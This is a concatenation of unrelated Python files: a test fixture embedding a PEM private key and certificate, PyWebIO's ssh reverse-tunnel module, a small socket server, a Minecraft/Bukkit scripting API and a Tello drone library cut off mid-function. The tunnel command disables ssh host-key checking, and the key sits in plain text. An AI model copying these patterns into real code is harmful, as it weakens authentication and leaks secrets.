dLApNJ6ThfsVjtedlpVPRMcCHwKBgQDYNgmCKrQ7SnRmCn2CMXj+hiGtHiWvDROw
dirAtgayJp8MsQ72sf6seSba/1QKXaowy65zENTvSUeWkeHqbP2uDdA8q6Stdo51
Wl0FjFWI2+7l8ajt39oFeXjcDBqXpB9zywF8+NvE/1aSOb5mA6FJ0CNTrPVESmzR
2tkf7FP6twKBgHmRFCFudXYfY315BDTJBDiEUVPysTTw6iizaagiv9kZpXOTldCN
Bw52Np6yF+wItitZA5i74loMg7ImHdM8pLQJGCIgAQOGAcaFi/eoxiAxEElWszOl
A2iNHW14aUs1BbTv+7CGUskY5bkPgdQzFxgoCnQqOjBunG4MRZi6+VvDAoGBAJp4
6Qw1xHUD+euZnRgyjnaSkGbmPhg2KJYPpvXuVxRbIZFowv8gJotFN6yJdZq+VsTs
EOQm52tamKoL6jOZ0RjUx61BGLPSG2/ess0u+UGBmMpygLYLE/KLWf0lLK6g1NPe
+141UpcJsulgFhc+irJ44XR8AvPalKrOSAhVyZ47AoGBANlNdybQ42Po+qwPKmnX
CrydNcDpjxvjOMBFK6u62H31azy1Ywjq/E889stWhC/gfu59mryoiaL3OHUSGKA4
vnq3uE6p9rrHemDbsbxu0ulB7nWjGYMO8CJ0eZQtJ2XhsAq6T+PLyjvtcTpF8Quj
qAq7Vjx1b1l0NttiU7YtSe+2
-----END PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIDQjCCAiqgAwIBAgIBBjANBgkqhkiG9w0BAQsFADANMQswCQYDVQQDDAJDQTAe
Fw0xOTAxMDEwMDAwMDBaFw0yODEyMzEyMzU5NTlaMBQxEjAQBgNVBAMMCTEyNy4w
LjAuMTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMoY3yYhCxPBKfCg
/6MXbAmerHyJb8Bt01Z6g9N/Pd739tmSV664h1JSJCTXkjEKhpIDGGQOcz9jYD30
JUZ8L9eEnQLc1lAZArwdWKH3df7/zLoesc9XJQpPPMQELQmeKnDsXtvBFG0Gejev
6WOLzhvhv8jRwy51z8/Th9liK/MpKtF5Lt2v8SHCUXcAC7QK/K3SJy2Bn52v2sea
t8eNktXQf76k1awJf9h/berPSAxmrkeVNo4+15SzLO9Lnb9O0qKCdhDAojbQNTUA
7WW1iuvIZ04pZTfESHbTANWRTv3j8IdNvwYh20nYdnpWdt4KBeh84YH7V8CrUtpw
D8ZhyikCAwEAAaOBpTCBojAJBgNVHRMEAjAAMAsGA1UdDwQEAwIF4DA0BgNVHSUE
LTArBggrBgEFBQcDAgYIKwYBBQUHAwEGCisGAQQBgjcKAwMGCWCGSAGG+EIEATAd
BgNVHQ4EFgQUCkRwfnvsDzuyMwDIsY7WEGkB68EwHwYDVR0jBBgwFoAUdaB4T0Jl
wTNT38CZsajeFw9KArUwEgYDVR0RAQH/BAgwBocEfwAAATANBgkqhkiG9w0BAQsF
AAOCAQEAStqUhxrmawsLE/2zs3koYDDokUaf8Ys0J1UBhszZ7QwFURBQTkxBU5im
avuQUHyzRuNjzMdS+UMqCwhBddiTNg9kFx+5eBpxJghheFXsQnMXsqtem7sbiEot
ZnfqzPhwJOvCVUzeyBta3YWCKFuP/sETizXNZvxIsTW0AQCIk+t98k6E6HnBD7/l
RpsGGA8wJJ9HCvJWY7vCWZi1kHTdtqvsG5a4MzGJag9gbKtuhIezXNRiHdNjbM4E
EZxxmiyIKzWDjHRToGyreMLCtbZB6Mnt5pQH8yZYBpxx4Gsx+tMhwsOSZvYetuPd
4srBSr1jxrFM2vyCz9iEUexA59IcMA==
-----END CERTIFICATE-----
"""
test_key_cert_pem = os_path.join(__cage_dir__, "ssl_keys", "test_key_cert.pem")
with open(test_key_cert_pem, "w") as f:
f.write(test_key_cert)
test_interface(test_key_cert_pem, test_ca_cert_pem, "HIGH:!aNULL:!MD5", "TLSv1")
###################################
if __name__ == "__main__": import pmnc.self_test; pmnc.self_test.run()
###############################################################################
# EOF
|
remote_access.py
|
"""
* Implementation of remote access
Use https://github.com/wang0618/localshare service by running a ssh subprocess in PyWebIO application.
The stdout of ssh process is the connection info.
"""
import json
import logging
import os
import threading
import time
import shlex
from subprocess import Popen, PIPE
import shutil
logger = logging.getLogger(__name__)
success_msg = """
================================================================================
PyWebIO Application Remote Access
Remote access address: {address}
================================================================================
"""
_ssh_process = None # type: Popen
def am_i_the_only_thread():
    """Whether the current thread is the only non-daemon thread in the process"""
    alive_non_daemonic_thread_cnt = sum(
        1 for t in threading.enumerate()
        if t.is_alive() and not t.daemon
    )
    return alive_non_daemonic_thread_cnt == 1
def remote_access_service(local_port=8080, server='app.pywebio.online', server_port=1022, setup_timeout=60):
"""
    Wait at most `setup_timeout` seconds for the ssh process to produce its output; if valid
    connection info is received, the tunnel is established. Otherwise report the error and kill the ssh process.
:param local_port: ssh local listen port
:param server: ssh server domain
:param server_port: ssh server port
:param setup_timeout: If the service can't setup successfully in `setup_timeout` seconds, then exit.
"""
global _ssh_process
cmd = "ssh -oStrictHostKeyChecking=no -R 80:localhost:%s -p %s %s -- --output json" % (
local_port, server_port, server)
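    # "-R 80:localhost:<local_port>" asks the remote server to forward requests back to
    # the local PyWebIO app, and "-- --output json" makes the remote service print the
    # public access address as a JSON line on stdout, which is parsed below.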
args = shlex.split(cmd)
logger.debug('remote access service command: %s', cmd)
_ssh_process = Popen(args, stdout=PIPE, stderr=PIPE)
logger.debug('remote access process pid: %s', _ssh_process.pid)
success = False
def timeout_killer(wait_sec):
time.sleep(wait_sec)
if not success and _ssh_process.poll() is None:
_ssh_process.kill()
threading.Thread(target=timeout_killer, kwargs=dict(wait_sec=setup_timeout), daemon=True).start()
stdout = _ssh_process.stdout.readline().decode('utf8')
logger.debug('ssh server stdout: %s', stdout)
connection_info = {}
try:
connection_info = json.loads(stdout)
success = True
except json.decoder.JSONDecodeError:
if not success and _ssh_process.poll() is None:
_ssh_process.kill()
if success:
if connection_info.get('status', 'fail') != 'success':
print("Failed to establish remote access, this is the error message from service provider:",
connection_info.get('message', ''))
else:
print(success_msg.format(address=connection_info['address']))
# wait ssh or main thread exit
while not am_i_the_only_thread() and _ssh_process.poll() is None:
time.sleep(1)
if _ssh_process.poll() is None: # main thread exit, kill ssh process
logger.debug('App process exit, killing ssh process')
_ssh_process.kill()
else: # ssh process exit by itself or by timeout killer
stderr = _ssh_process.stderr.read().decode('utf8')
if stderr:
logger.error('PyWebIO application remote access service error: %s', stderr)
else:
logger.info('PyWebIO application remote access service exit.')
def start_remote_access_service_(**kwargs):
try:
remote_access_service(**kwargs)
except KeyboardInterrupt: # ignore KeyboardInterrupt
pass
finally:
if _ssh_process:
logger.debug('Exception occurred, killing ssh process')
_ssh_process.kill()
raise SystemExit
def start_remote_access_service(**kwargs):
if not shutil.which("ssh"):
return logging.error("No ssh client found, remote access service can't start.")
server = os.environ.get('PYWEBIO_REMOTE_ACCESS', 'app.pywebio.online:1022')
if ':' not in server:
server_port = 22
else:
server, server_port = server.split(':', 1)
kwargs.setdefault('server', server)
kwargs.setdefault('server_port', server_port)
thread = threading.Thread(target=start_remote_access_service_, kwargs=kwargs)
thread.start()
return thread
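# Typical embedding (illustrative, not part of the original module): call
# start_remote_access_service() from the PyWebIO application once the local server
# is listening; a different tunnel server can be selected via the PYWEBIO_REMOTE_ACCESS
# environment variable, e.g. "PYWEBIO_REMOTE_ACCESS=app.pywebio.online:1022".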
if __name__ == '__main__':
import argparse
logging.basicConfig(level=logging.DEBUG)
parser = argparse.ArgumentParser(description="localhost.run Remote Access service")
parser.add_argument("--local-port", help="the local port to connect the tunnel to", type=int, default=8080)
parser.add_argument("--server", help="the local port to connect the tunnel to", type=str,
default='app.pywebio.online')
parser.add_argument("--server-port", help="the local port to connect the tunnel to", type=int, default=1022)
args = parser.parse_args()
t = start_remote_access_service(local_port=args.local_port, server=args.server, server_port=args.server_port)
t.join()
|
server1.py
|
import socket
import threading
import random
HEADER = 64
PORT = 65432
SERVER = socket.gethostbyname(socket.gethostname())
ADDR = (SERVER, PORT)
FORMAT = 'utf-8'
DISCONNECT_MESSAGE = '!DISCONNECT'
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server.bind(ADDR)
def handle_client(conn, addr): #handles client individually (threaded)
print(f"[NEW CONNECTION] {addr} connected.")
connected = True
    while connected:
        msg_length = conn.recv(HEADER).decode(FORMAT)  # fixed-size length header from the client
        if msg_length:  # an empty read means the client closed the connection
            msg_length = int(msg_length)
            msg = conn.recv(msg_length).decode(FORMAT)
            if msg == DISCONNECT_MESSAGE:
                connected = False
            print(f'[{addr}] {msg}')  # print what the client sent to the server
            conn.send(f"[FROM SERVER] {msg} {random.randint(1,10)}".encode(FORMAT))
        else:
            connected = False
#for debugging
# voltage = random.randint(1,10)
# conn.send(f'[FROM SERVER] Voltage is now {voltage}'.encode(FORMAT))
conn.close()
def start():
server.listen()
print(f"[LISTENING] Server is listening on {SERVER}")
while True:
conn, addr = server.accept()
thread = threading.Thread(target = handle_client, args = (conn,addr))
thread.start()
print(f"[ACTIVE CONNECTIONS] {threading.activeCount()-1}")
if __name__ == '__main__':
print("[STARTING] server is starting...")
start()
# def maingui(client):
# pass
#
# guithread = threading.Thread(target = maingui, args = (client))
# guithread.start()
#
# def livefeed(timeout):
# pass
#
# livefeedthread = threading.Thread(target = livefeed, args = (timeout))
# livefeedthread.start()
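# A minimal client sketch (illustrative only, not part of the original script)
# matching the protocol above: a fixed HEADER-byte ASCII length field is sent
# first, followed by the UTF-8 encoded message itself.
def example_client(message=DISCONNECT_MESSAGE):
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect(ADDR)
    payload = message.encode(FORMAT)
    header = str(len(payload)).encode(FORMAT)
    header += b' ' * (HEADER - len(header))  # pad the length field to HEADER bytes
    client.sendall(header + payload)
    print(client.recv(2048).decode(FORMAT))
    client.close()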
|
mcapi.py
|
#!/bin/python
# -*- coding: utf-8 -*-
# from __future__ import absolute_import, division, print_function, unicode_literals
# Doesn't work with Jython, with not much hope of improving
# See https://bugs.jython.org/issue2007
print ('MCAPI activating')
# Set default encoding to utf-8
import os
if os.name == 'java':
from org.python.core import codecs
codecs.setDefaultEncoding('utf-8')
from org.bukkit import Bukkit
from org.bukkit import Location, Color, Effect, Material, Sound, TreeType, Particle, FireworkEffect
from org.bukkit.plugin import EventExecutor
from org.bukkit.entity import EntityType
from org.bukkit.command import Command
from org.bukkit.event import Listener, EventPriority, HandlerList
from org.bukkit.scheduler import BukkitRunnable
from org.bukkit.FireworkEffect import Type as FireworkEffectType
from functools import wraps
from threading import Thread
from random import *
from time import sleep
import sys
import traceback
SERVER = Bukkit.getServer()
WORLD = SERVER.getWorlds().get(0)
PLUGIN = SERVER.getPluginManager().getPlugin('MinecraftPyServer')
_commandMapField = SERVER.getClass().getDeclaredField("commandMap")
_commandMapField.setAccessible(True)
_commandMap = _commandMapField.get(SERVER)
class SpigotRunnable(BukkitRunnable):
def __init__(self, execfunc):
        super(SpigotRunnable, self).__init__()
self.execfunc = execfunc
self.returnval = None
self.done = False
def run(self):
try:
self.returnval = self.execfunc()
except Exception as e:
print('\n*** An error occurred:\n' + str(e))
sys.stdout.flush()
self.done = True
class SpigotCommand(Command):
def __init__(self, name, execfunc):
Command.__init__(self, name)
self.execfunc = execfunc
def execute(self, caller, label, parameters):
self.execfunc(caller, parameters)
class EventListener(Listener):
def __init__(self, func):
self.func = func
def execute(self, event):
self.func(event)
# EventExecutor implementation
class Executor(EventExecutor):
def execute(self, listener, event):
listener.execute(event)
class AttrWrapper(object):
def __init__(self, wrapped):
self._wrapped = wrapped
self.delay = None
def __str__(self):
return self._wrapped.__str__()
def __getattr__(self, name):
f = getattr(self._wrapped, name)
@wraps(f)
def wrapped_f(*args, **kwargs):
g = lambda: f(*args, **kwargs)
d = self.delay
self.delay = None
return run_spigot_thread(g, delay=d, wait_for=True)
return wrapped_f
def run_local_thread(execfunc):
def wrap_exception(g):
try:
g()
except Exception as e:
traceback.print_exc(file=sys.stderr)
sys.stderr.flush()
Thread(target=lambda: wrap_exception(execfunc)).start()
sys.stderr.flush()
def run_spigot_thread(execfunc, delay, wait_for):
spigot_runnable = SpigotRunnable(execfunc)
if delay is None: spigot_runnable.runTask(PLUGIN)
else: spigot_runnable.runTaskLater(PLUGIN, delay)
if wait_for:
while not spigot_runnable.done:
sleep(0.1)
return spigot_runnable.returnval
return spigot_runnable
def asynchronous():
def actual_decorator(f):
@wraps(f)
def wrapped_f(*args, **kwargs):
g = lambda: f(*args, **kwargs)
return run_local_thread(g)
return wrapped_f
return actual_decorator
def synchronous(delay=None, wait_for=True):
def actual_decorator(f):
@wraps(f)
def wrapped_f(*args, **kwargs):
g = lambda: f(*args, **kwargs)
return run_spigot_thread(g, delay, wait_for)
return wrapped_f
return actual_decorator
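# Illustrative usage (assumed, not part of the original API docs): Bukkit calls must
# run on the server thread, so user functions are wrapped the same way as the
# helpers below, e.g.
#     @synchronous(delay=20)      # schedule one second (20 ticks) later
#     def greet(name):
#         player(name).sendMessage("hello")
# whereas @asynchronous() runs the wrapped function on a plain Python thread.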
def add_command(name, execfunc):
# execfunc signature: execfunc(caller, params)
_commandMap.register("jycraft", SpigotCommand(name, execfunc))
return name
def remove_command(name):
_commandMap.getCommand(name).unregister(_commandMap)
_commandMap.getKnownCommands().remove(name)
def add_event_listener(event_type, execfunc, priority=EventPriority.NORMAL):
# execfunc signature: execfunc(event)
listener = EventListener(execfunc)
executor = Executor()
SERVER.getPluginManager().registerEvent(event_type, listener, priority, executor, PLUGIN)
return listener
def remove_event_listeners():
HandlerList.unregisterAll(PLUGIN)
def remove_event_listener(listener):
HandlerList.unregisterAll(listener)
world = AttrWrapper(WORLD)
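# Through AttrWrapper, any attribute access on `world` (e.g. world.getTime()) is
# proxied to the Bukkit World object and executed on the server thread via
# run_spigot_thread; setting world.delay to a tick count before a call defers
# that single call by the given delay.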
# -------------------------
# Built-in helper functions
# -------------------------
def parseargswithpos(args, kwargs=None, asint=True, ledger={}):
results = {}
if kwargs is None: kwargs = {}
if isinstance(args[0], int) or isinstance(args[0], float):
base = 3
tr = [args[0], args[1], args[2]]
elif 'x' in kwargs and 'y' in kwargs and 'z' in kwargs:
base = 0
tr = [kwargs['x'], kwargs['y'], kwargs['z']]
elif isinstance(args[0], list):
base = 1
tr = [args[0][0], args[0][1], args[0][2]]
elif isinstance(args[0], dict):
base = 1
tr = [args[0]['x'], args[0]['y'], args[0]['z']]
else:
base = 1
tr = [args[0].x, args[0].y, args[0].z]
    if asint:
        tr = [int(tr[0]), int(tr[1]), int(tr[2])]
    results['x'] = tr[0]
    results['y'] = tr[1]
    results['z'] = tr[2]
for k, v in ledger.iteritems():
results[k] = kwargs.get(v[0], None)
if results[k] is None:
if len(args) > base+v[1]:
results[k] = args[base+v[1]]
else:
results[k] = v[2]
return results
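# For illustration (the call below is hypothetical): coordinates can be passed
# positionally, as x/y/z keywords, as a list/dict, or as an object with .x/.y/.z
# attributes, and any extra options are resolved through the ledger mapping
# {result_key: [kwarg_name, positional_offset, default]}, e.g.
#     parseargswithpos((10, 64, -5, Material.GLASS), {},
#                      ledger={'type': ['type', 0, Material.COBBLESTONE]})
# returns {'x': 10, 'y': 64, 'z': -5, 'type': Material.GLASS}.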
def player(name=None):
if name:
return SERVER.getPlayer(name)
pl = SERVER.getOnlinePlayers()
return choice(pl)
def location(*args):
if len(args) == 0:
return player().getLocation()
if len(args) == 1:
return args[0].getLocation()
return Location(WORLD, *args)
def lookingat(entity=None, distance=100):
if not entity:
entity = player()
return entity.getTargetBlock(None, distance)
def yell(message):
SERVER.broadcastMessage(message)
@synchronous()
def time(time=None):
if time is None:
return WORLD.getTime()
WORLD.setTime(time)
@synchronous()
def weather(raining=False, thunder=False):
WORLD.setStorm(raining)
WORLD.setThundering(thunder)
@synchronous()
def teleport(*args, **kwargs):
r = parseargswithpos(args, kwargs, ledger={'whom':['whom', 0, None]})
if not r['whom']:
r['whom'] = player().getName()
someone = player(r['whom'])
someone.teleport(location(r['x'], r['y'], r['z']))
@synchronous()
def getblock(*args, **kwargs):
r = parseargswithpos(args, kwargs)
return WORLD.getBlockAt(r['x'], r['y'], r['z'])
@synchronous()
def setblock(*args, **kwargs):
r = parseargswithpos(args, kwargs, ledger={
'type':['type', 0, Material.COBBLESTONE]})
WORLD.getBlockAt(r['x'], r['y'], r['z']).setType(r['type'])
@synchronous()
def line_x(*args, **kwargs):
r = parseargswithpos(args, kwargs, ledger={
'type':['type', 0, Material.COBBLESTONE],
'size':['size', 1, 4]})
size = min(r['size'], 12)
for s in range(size):
setblock(s + r['x'], r['y'], r['z'], r['type'])
@synchronous()
def line_y(*args, **kwargs):
r = parseargswithpos(args, kwargs, ledger={
'type':['type', 0, Material.COBBLESTONE],
'size':['size', 1, 4]})
size = min(r['size'], 12)
for s in range(size):
setblock(r['x'], s + r['y'], r['z'], r['type'])
@synchronous()
def line_z(*args, **kwargs):
r = parseargswithpos(args, kwargs, ledger={
'type':['type', 0, Material.COBBLESTONE],
'size':['size', 1, 4]})
size = min(r['size'], 12)
for s in range(size):
setblock(r['x'], r['y'], s + r['z'], r['type'])
@synchronous()
def cube(*args, **kwargs):
r = parseargswithpos(args, kwargs, ledger={
'type':['type', 0, Material.COBBLESTONE],
'size':['size', 1, 4]})
size = min(r['size'], 12)
for x in range(size):
for y in range(size):
for z in range(size):
setblock(x + r['x'], y + r['y'], z + r['z'], r['type'])
@synchronous()
def bolt(*args, **kwargs):
r = parseargswithpos(args, kwargs)
return WORLD.strikeLightning(location(r['x'], r['y'], r['z']))
@synchronous()
def explosion(*args, **kwargs):
r = parseargswithpos(args, kwargs, ledger={'power':['power', 0, 8]})
return WORLD.createExplosion(r['x'], r['y'], r['z'], r['power'], True)
@synchronous()
def particle(*args, **kwargs):
r = parseargswithpos(args, kwargs, ledger={
'type':['type', 0, Particle.SPELL],
'count':['count', 1, 100],
'ox':['ox', 2, 1],
'oy':['oy', 3, 1],
'oz':['oz', 4, 1],
'speed':['speed', 5, 100],
'data':['data', 6, None]})
WORLD.spawnParticle(r['type'],
r['x'], r['y'], r['z'],
r['count'],
r['ox'], r['oy'], r['oz'],
r['speed'], r['data'])
@synchronous(wait_for=True)
def spawn(*args, **kwargs):
r = parseargswithpos(args, kwargs, ledger={
'type':['type', 0, EntityType.CHICKEN]})
return WORLD.spawnEntity(location(r['x'], r['y'], r['z']), r['type'])
@synchronous()
def effect(*args, **kwargs):
r = parseargswithpos(args, kwargs, ledger={
'type':['type', 0, Effect.PORTAL_TRAVEL],
'data':['data', 1, 0],
'radius': ['radius', 2, 10]})
WORLD.playEffect(location(r['x'], r['y'], r['z']), r['type'], r['data'], r['radius'])
@synchronous()
def sound(*args, **kwargs):
r = parseargswithpos(args, kwargs, ledger={
'type':['type', 0, Sound.BLOCK_GLASS_BREAK],
'volume':['volume', 1, 1.0],
'pitch':['pitch', 2, 1.0]})
WORLD.playSound(location(r['x'], r['y'], r['z']), r['type'], r['volume'], r['pitch'])
@synchronous()
def tree(*args, **kwargs):
r = parseargswithpos(args, kwargs, ledger={
'type':['type', 0, TreeType.TREE]})
WORLD.generateTree(location(r['x'], r['y'], r['z']), r['type'])
@synchronous()
def fireworks(*args, **kwargs):
r = parseargswithpos(args, kwargs, ledger={
'power':['power', 0, 3],
'builder':['builder', 1, None]})
    # fall back to a default trail effect when no builder is supplied
    builder = r['builder'] or FireworkEffect.builder().withTrail().withColor(Color.BLUE, Color.RED)
    fwe = builder.build()
fw = WORLD.spawnEntity(location(r['x'], r['y'], r['z']), EntityType.FIREWORK)
fwm = fw.getFireworkMeta()
fwm.addEffect(fwe)
fwm.setPower(r['power'])
fw.setFireworkMeta(fwm)
|
tello.py
|
"""Library for interacting with DJI Ryze Tello drones.
"""
# coding=utf-8
import logging
import socket
import time
from threading import Lock, Thread
from typing import Optional, Union, Type, Dict
from cv2 import add
from rospy import sleep
from .enforce_types import enforce_types
import av
import cv2 as cv
import numpy as np
import os
threads_initialized = False
drones: Optional[dict] = {}
client_socket: socket.socket
class TelloException(Exception):
pass
@enforce_types
class Tello:
"""Python wrapper to interact with the Ryze Tello drone using the official Tello api.
Tello API documentation:
[1.3](https://dl-cdn.ryzerobotics.com/downloads/tello/20180910/Tello%20SDK%20Documentation%20EN_1.3.pdf),
[2.0 with EDU-only commands](https://dl-cdn.ryzerobotics.com/downloads/Tello/Tello%20SDK%202.0%20User%20Guide.pdf)
"""
# Send and receive commands, client socket
RESPONSE_TIMEOUT = 7 # in seconds
TAKEOFF_TIMEOUT = 20 # in seconds
FRAME_GRAB_TIMEOUT = 5
TIME_BTW_COMMANDS = 0.1 # in seconds
TIME_BTW_RC_CONTROL_COMMANDS = 0.001 # in seconds
RETRY_COUNT = 3 # number of retries after a failed command
TELLO_IP = '192.168.10.1' # Tello IP address
CONTROL_UDP_PORT = 8889
STATE_UDP_PORT = 8890
# Constants for video settings
BITRATE_AUTO = 0
BITRATE_1MBPS = 1
BITRATE_2MBPS = 2
BITRATE_3MBPS = 3
BITRATE_4MBPS = 4
BITRATE_5MBPS = 5
RESOLUTION_480P = 'low'
RESOLUTION_720P = 'high'
FPS_5 = 'low'
FPS_15 = 'middle'
FPS_30 = 'high'
CAMERA_FORWARD = 0
CAMERA_DOWNWARD = 1
# Set up logger
HANDLER = logging.StreamHandler()
FORMATTER = logging.Formatter('[%(levelname)s] %(filename)s - %(lineno)d - %(message)s')
HANDLER.setFormatter(FORMATTER)
LOGGER = logging.getLogger('djitellopy')
LOGGER.addHandler(HANDLER)
LOGGER.setLevel(logging.INFO)
# Use Tello.LOGGER.setLevel(logging.<LEVEL>) in YOUR CODE
# to only receive logs of the desired level and higher
# Conversion functions for state protocol fields
INT_STATE_FIELDS = (
# Tello EDU with mission pads enabled only
'mid', 'x', 'y', 'z',
# 'mpry': (custom format 'x,y,z')
# Common entries
'pitch', 'roll', 'yaw',
'vgx', 'vgy', 'vgz',
'templ', 'temph',
'tof', 'h', 'bat', 'time'
)
FLOAT_STATE_FIELDS = ('baro', 'agx', 'agy', 'agz')
state_field_converters: Dict[str, Union[Type[int], Type[float]]]
state_field_converters = {key : int for key in INT_STATE_FIELDS}
state_field_converters.update({key : float for key in FLOAT_STATE_FIELDS})
# VideoCapture object
background_frame_read: Optional['BackgroundFrameRead'] = None
stream_on = False
is_flying = False
def __init__(self,
state_update_callback=None,
av_open_lock=None,
video_frontend=None,
host=TELLO_IP,
retry_count=RETRY_COUNT,
):
global threads_initialized, client_socket, drones
self.address = (host, Tello.CONTROL_UDP_PORT)
self.stream_on = False
self.retry_count = retry_count
self.last_received_command_timestamp = time.time()
self.last_rc_control_timestamp = time.time()
self.state_update_callback = state_update_callback
self.av_open_lock = av_open_lock
self.video_frontend = video_frontend
self.last_packet_received = 0
self.last_video_frame_received = 0
self.is_alive = False
if not threads_initialized:
# Run Tello command responses UDP receiver on background
client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client_socket.bind(('', Tello.CONTROL_UDP_PORT))
response_receiver_thread = Thread(target=Tello.udp_response_receiver)
response_receiver_thread.daemon = True
response_receiver_thread.start()
# Run state UDP receiver on background
state_receiver_thread = Thread(target=Tello.udp_state_receiver)
state_receiver_thread.daemon = True
state_receiver_thread.start()
threads_initialized = True
drones[host] = {'responses': [], 'state': {}, 'drone': self}
self.LOGGER.info("Tello instance was initialized. Host: '{}'. Port: '{}'.".format(host, Tello.CONTROL_UDP_PORT))
def get_own_udp_object(self):
"""Get own object from the global drones dict. This object is filled
with responses and state information by the receiver threads.
Internal method, you normally wouldn't call this yourself.
"""
global drones
host = self.address[0]
return drones[host]
@staticmethod
def udp_response_receiver():
"""Setup drone UDP receiver. This method listens for responses of Tello.
Must be run from a background thread in order to not block the main thread.
Internal method, you normally wouldn't call this yourself.
"""
while True:
data, address = client_socket.recvfrom(1024)
address = address[0]
Tello.LOGGER.debug('Data received from {} at client_socket'.format(address))
if address not in drones:
continue
drones[address]['drone'].last_packet_received = time.time()
drones[address]['responses'].append(data)
@staticmethod
def udp_state_receiver():
"""Setup state UDP receiver. This method listens for state information from
Tello. Must be run from a background thread in order to not block
the main thread.
Internal method, you normally wouldn't call this yourself.
"""
state_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
state_socket.bind(("", Tello.STATE_UDP_PORT))
while True:
data, address = state_socket.recvfrom(1024)
address = address[0]
Tello.LOGGER.debug('Data received from {} at state_socket'.format(address))
if address not in drones:
continue
data = data.decode('ASCII')
state = Tello.parse_state(data)
drones[address]['state'] = state
if drones[address]['drone'] is not None:
drones[address]['drone'].state_update_callback(state)
drones[address]['drone'].last_packet_received = time.time()
@staticmethod
def parse_state(state: str) -> Dict[str, Union[int, float, str]]:
"""Parse a state line to a dictionary
Internal method, you normally wouldn't call this yourself.
"""
state = state.strip()
Tello.LOGGER.debug('Raw state data: {}'.format(state))
if state == 'ok':
return {}
state_dict = {}
for field in state.split(';'):
split = field.split(':')
if len(split) < 2:
continue
key = split[0]
value: Union[int, float, str] = split[1]
if key in Tello.state_field_converters:
num_type = Tello.state_field_converters[key]
try:
value = num_type(value)
except ValueError as e:
Tello.LOGGER.debug('Error parsing state value for {}: {} to {}'
.format(key, value, num_type))
Tello.LOGGER.error(e)
continue
state_dict[key] = value
return state_dict
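    # Illustrative example (field values assumed): a raw state line such as
    # "pitch:0;roll:-1;yaw:3;bat:87;baro:44.52;" is parsed by parse_state into
    # {'pitch': 0, 'roll': -1, 'yaw': 3, 'bat': 87, 'baro': 44.52}, with
    # int/float conversion driven by state_field_converters above.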
def get_current_state(self) -> dict:
"""Call this function to attain the state of the Tello. Returns a dict
with all fields.
Internal method, you normally wouldn't call this yourself.
"""
return self.get_own_udp_object()['state']
def get_state_field(self, key: str):
"""Get a specific sate field by name.
Internal method, you normally wouldn't call this yourself.
"""
state = self.get_current_state()
if key in state:
return state[key]
else:
raise TelloException('Could not get state property: {}'.format(key))
def get_mission_pad_id(self) -> int:
"""Mission pad ID of the currently detected mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: -1 if none is detected, else 1-8
"""
return self.get_state_field('mid')
def get_mission_pad_distance_x(self) -> int:
"""X distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('x')
def get_mission_pad_distance_y(self) -> int:
"""Y distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('y')
def get_mission_pad_distance_z(self) -> int:
"""Z distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('z')
def get_pitch(self) -> int:
"""Get pitch in degree
Returns:
int: pitch in degree
"""
return self.get_state_field('pitch')
def get_roll(self) -> int:
"""Get roll in degree
Returns:
int: roll in degree
"""
return self.get_state_field('roll')
def get_yaw(self) -> int:
"""Get yaw in degree
Returns:
int: yaw in degree
"""
return self.get_state_field('yaw')
def get_speed_x(self) -> int:
"""X-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgx')
def get_speed_y(self) -> int:
"""Y-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgy')
def get_speed_z(self) -> int:
"""Z-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgz')
def get_acceleration_x(self) -> float:
"""X-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agx')
def get_acceleration_y(self) -> float:
"""Y-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agy')
def get_acceleration_z(self) -> float:
"""Z-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agz')
def get_lowest_temperature(self) -> int:
"""Get lowest temperature
Returns:
int: lowest temperature (°C)
"""
return self.get_state_field('templ')
def get_highest_temperature(self) -> int:
"""Get highest temperature
Returns:
            int: highest temperature (°C)
"""
return self.get_state_field('temph')
def get_temperature(self) -> float:
"""Get average temperature
Returns:
float: average temperature (°C)
"""
templ = self.get_lowest_temperature()
temph = self.get_highest_temperature()
return (templ + temph) / 2
def get_height(self) -> int:
"""Get current height in cm
Returns:
int: height in cm
"""
return self.get_state_field('h')
def get_distance_tof(self) -> int:
"""Get current distance value from TOF in cm
Returns:
int: TOF distance in cm
"""
return self.get_state_field('tof')
def get_barometer(self) -> int:
"""Get current barometer measurement in cm
This resembles the absolute height.
See https://en.wikipedia.org/wiki/Altimeter
Returns:
int: barometer measurement in cm
"""
return self.get_state_field('baro') * 100
def get_flight_time(self) -> int:
"""Get the time the motors have been active in seconds
Returns:
int: flight time in s
"""
return self.get_state_field('time')
def get_battery(self) -> int:
"""Get current battery percentage
Returns:
int: 0-100
"""
return self.get_state_field('bat')
def get_udp_video_address(self) -> str:
"""Internal method, you normally wouldn't call this youself.
"""
address_schema = 'udp://0.0.0.0:{port}' # + '?overrun_nonfatal=1&fifo_size=5000'
address = address_schema.format(port=self.video_stream_port)
return address
def get_frame_read(self, callback) -> 'BackgroundFrameRead':
"""Get the BackgroundFrameRead object from the camera drone. Then, you just need to call
backgroundFrameRead.frame to get the actual frame received by the drone.
Returns:
BackgroundFrameRead
"""
if self.background_frame_read is None:
address = self.get_udp_video_address()
self.background_frame_read = BackgroundFrameRead(self, address, callback)
self.background_frame_read.start()
return self.background_frame_read
def send_command_with_return(self, command: str, timeout: int = RESPONSE_TIMEOUT, robust: bool = False) -> str:
"""Send command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
        Returns:
            str: 'ok' on success, or an error message when unsuccessful.
"""
        # Commands sent in rapid succession can make the drone unresponsive,
        # so wait at least self.TIME_BTW_COMMANDS seconds between commands
diff = time.time() - self.last_received_command_timestamp
if diff < self.TIME_BTW_COMMANDS:
